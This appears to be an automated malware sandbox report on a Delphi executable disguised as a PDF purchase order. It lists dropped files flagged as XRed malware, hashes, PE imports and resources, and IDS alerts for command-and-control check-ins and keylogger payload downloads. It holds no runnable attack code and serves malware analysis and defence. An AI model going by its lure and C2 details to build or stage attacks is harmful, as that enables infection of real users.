                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):165
                                                                                                                      Entropy (8bit):1.610853976637159
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:iXFQLjLlAWFd:97
                                                                                                                      MD5:CA2C2DB316A89F044206082EEB3A366E
                                                                                                                      SHA1:B1B7DFF94B991B26093AA29BF3793DDE245412E1
                                                                                                                      SHA-256:12393F1035745AD02C149920E37AFFE459CD0448A2AFEE25C1FABA8060758FF7
                                                                                                                      SHA-512:66BC8C779431737A3FA00AF7697C299BC473B6FD22D48914986821DA7C0AB90554D32F7F2B471EAB5410F9C0DE7E076F4D6DEDDCCE1948818F7781DAE9EDEBE7
                                                                                                                      Malicious:false
                                                                                                                      Preview:.user ..e.n.g.i.n.e.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                      C:\Users\user\Documents\IPKGELNTQY\~$cache1

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):771584
                                                                                                                      Entropy (8bit):6.638013190381294
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                      MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                      SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                      SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                      SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1835008
                                                                                                                      Entropy (8bit):4.468706863402155
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:gzZfpi6ceLPx9skLmb0fhZWSP3aJG8nAgeiJRMMhA2zX4WABluuNZjDH5S:2ZHthZWOKnMM6bFpLj4
                                                                                                                      MD5:BA1728EA73BC8ECAE632203EB6567049
                                                                                                                      SHA1:73C6CDEC9D039C624BCE4D343A25365C0E85F99D
                                                                                                                      SHA-256:7CEBFA5FDE360BFAEFF01ACF35C694A5ADC95D1EE6900580D2DAC081948D8CA2
                                                                                                                      SHA-512:DFA945ABDB760AF9AE6BA2CEA4A2362C02CB6E86493F8B79A5C1454E46AC7B1D7AC22A4F843052790E8B9D826A8BB78AE712578EB32CC60BA4E0A0C2F370EEBD
                                                                                                                      Malicious:false
                                                                                                                      Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmz.1U.Z..............................................................................................................................................................................................................................................................................................................................................{-'a........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):7.056405744702409
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 92.57%
                                                                                                                      • Win32 Executable Borland Delphi 7 (665061/41) 6.16%
                                                                                                                      • Windows ActiveX control (116523/4) 1.08%
                                                                                                                      • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                      File name:New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      File size:2'203'648 bytes
                                                                                                                      MD5:38d3095d1b748cd53c65395718d7c5f4
                                                                                                                      SHA1:3c0221471b641a641a9141a731f6ee09663e6538
                                                                                                                      SHA256:f3724bf49bfd8d11ef1f81b4c6aebc4d3281cecfa357d4fb3ae388a4add242e6
                                                                                                                      SHA512:f0ab6ed5dfa52d8159c5090fd96087ba8e89c26c2fdb90fae3f4d19b6952250ecd49846b9198d7c77affb6fabe3a0e53758392409a73552b202591433afc03e6
                                                                                                                      SSDEEP:49152:ZnsHyjtk2MYC5GDqkwkn9IMHea2A07SXq6zMaPCSO:Znsmtk2acdnV+FSvPCt
                                                                                                                      TLSH:B6A5CF62B3C58176C273523AAC37A752AC3B7E191D34B54F3FE42E1DAE35342151A2A3
                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                      File Icon

                                                                                                                      Icon Hash:2eec8e8cb683b9b1

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x49ab80
                                                                                                                      Entrypoint Section:CODE
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                      DLL Characteristics:
                                                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:332f7ce65ead0adfb3d35147033aabe9

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      add esp, FFFFFFF0h
                                                                                                                      mov eax, 0049A778h
                                                                                                                      call 00007F6DF0AF236Dh
                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      call 00007F6DF0B45CB5h
                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      mov edx, 0049ABE0h
                                                                                                                      call 00007F6DF0B458B4h
                                                                                                                      mov ecx, dword ptr [0049DBDCh]
                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      mov edx, dword ptr [00496590h]
                                                                                                                      call 00007F6DF0B45CA4h
                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      call 00007F6DF0B45D18h
                                                                                                                      call 00007F6DF0AEFE4Bh
                                                                                                                      add byte ptr [eax], al

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x16f730.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                      .rsrc0xb00000x16f7300x16f8001afc13ddd1c5a98d51946e6356c153e9False0.6416520514455782data7.1581346783004784IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_CURSOR0xb0dc80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                                      RT_CURSOR0xb0efc0x134data0.4642857142857143
                                                                                                                      RT_CURSOR0xb10300x134data0.4805194805194805
                                                                                                                      RT_CURSOR0xb11640x134data0.38311688311688313
                                                                                                                      RT_CURSOR0xb12980x134data0.36038961038961037
                                                                                                                      RT_CURSOR0xb13cc0x134data0.4090909090909091
                                                                                                                      RT_CURSOR0xb15000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                                      RT_BITMAP0xb16340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                      RT_BITMAP0xb18040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                                                      RT_BITMAP0xb19e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                      RT_BITMAP0xb1bb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                                                      RT_BITMAP0xb1d880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                                                      RT_BITMAP0xb1f580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                                                      RT_BITMAP0xb21280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                                                      RT_BITMAP0xb22f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                      RT_BITMAP0xb24c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                                                      RT_BITMAP0xb26980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                      RT_BITMAP0xb28680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                                      RT_ICON0xb29500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.36350844277673544
                                                                                                                      RT_ICON0xb39f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                                                      RT_DIALOG0xb4aa00x52data0.7682926829268293
                                                                                                                      RT_STRING0xb4af40x358data0.3796728971962617
                                                                                                                      RT_STRING0xb4e4c0x428data0.37406015037593987
                                                                                                                      RT_STRING0xb52740x3a4data0.40879828326180256
                                                                                                                      RT_STRING0xb56180x3bcdata0.33472803347280333
                                                                                                                      RT_STRING0xb59d40x2d4data0.4654696132596685
                                                                                                                      RT_STRING0xb5ca80x334data0.42804878048780487
                                                                                                                      RT_STRING0xb5fdc0x42cdata0.42602996254681647
                                                                                                                      RT_STRING0xb64080x1f0data0.4213709677419355
                                                                                                                      RT_STRING0xb65f80x1c0data0.44419642857142855
                                                                                                                      RT_STRING0xb67b80xdcdata0.6
                                                                                                                      RT_STRING0xb68940x320data0.45125
                                                                                                                      RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                                                      RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                                                      RT_STRING0xb6da40x268data0.4707792207792208
                                                                                                                      RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                                                      RT_STRING0xb74040x378data0.41103603603603606
                                                                                                                      RT_STRING0xb777c0x380data0.35379464285714285
                                                                                                                      RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                                                      RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                                                      RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                                                      RT_STRING0xb800c0x368data0.40940366972477066
                                                                                                                      RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                                                      RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                                                      RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                                                      RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                                                      RT_RCDATA0xb8e040x10data1.5
                                                                                                                      RT_RCDATA0xb8e140x15da00PE32 executable (GUI) Intel 80386, for MS Windows0.5394763946533203
                                                                                                                      RT_RCDATA0x2168140x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                                                      RT_RCDATA0x2168180x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                                                      RT_RCDATA0x21a4180x64cdata0.5998759305210918
                                                                                                                      RT_RCDATA0x21aa640x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                                                      RT_RCDATA0x21abb80x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                                                      RT_GROUP_CURSOR0x21f38c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                      RT_GROUP_CURSOR0x21f3a00x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                      RT_GROUP_CURSOR0x21f3b40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                      RT_GROUP_CURSOR0x21f3c80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                      RT_GROUP_CURSOR0x21f3dc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                      RT_GROUP_CURSOR0x21f3f00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                      RT_GROUP_CURSOR0x21f4040x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                      RT_GROUP_ICON0x21f4180x14dataTurkishTurkey1.1
                                                                                                                      RT_VERSION0x21f42c0x304dataTurkishTurkey0.42875647668393785

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                                      user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                      advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
                                                                                                                      kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                                                      version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                      gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                                      user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                      ole32.dllCLSIDFromString
                                                                                                                      kernel32.dllSleep
                                                                                                                      oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                      ole32.dllCLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                                                      oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                                      comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                      shell32.dllShellExecuteExA, ExtractIconExW
                                                                                                                      wininet.dllInternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                                                      shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
                                                                                                                      advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                                                      wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                                                      netapi32.dllNetbios

                                                                                                                      Possible Origin

                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      TurkishTurkey

                                                                                                                      Network Behavior

                                                                                                                      Suricata IDS Alerts

                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2024-12-30T11:40:20.115020+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.650146172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:40:20.115020+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.650153172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:40:20.115020+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.650147172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:40:20.115020+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.649876172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:40:20.115020+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.650073172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:40:20.115020+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.650150172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:40:20.115020+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.649971172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:40:20.115020+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.650154172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:40:20.115020+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.649769172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:40:20.115020+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.650139172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:40:37.786370+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.64975169.42.215.25280TCP
                                                                                                                      2024-12-30T11:40:38.133447+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.649741142.250.185.78443TCP
                                                                                                                      2024-12-30T11:40:38.137980+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.649742142.250.185.78443TCP
                                                                                                                      2024-12-30T11:40:38.873446+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.649769172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:40:39.112067+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.649759142.250.185.78443TCP
                                                                                                                      2024-12-30T11:40:39.189594+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.649760142.250.185.78443TCP
                                                                                                                      2024-12-30T11:40:40.089973+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.649774142.250.185.78443TCP
                                                                                                                      2024-12-30T11:40:40.171848+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.649777142.250.185.78443TCP
                                                                                                                      2024-12-30T11:40:41.075058+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.649787142.250.185.78443TCP
                                                                                                                      2024-12-30T11:40:41.144474+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.649788142.250.185.78443TCP
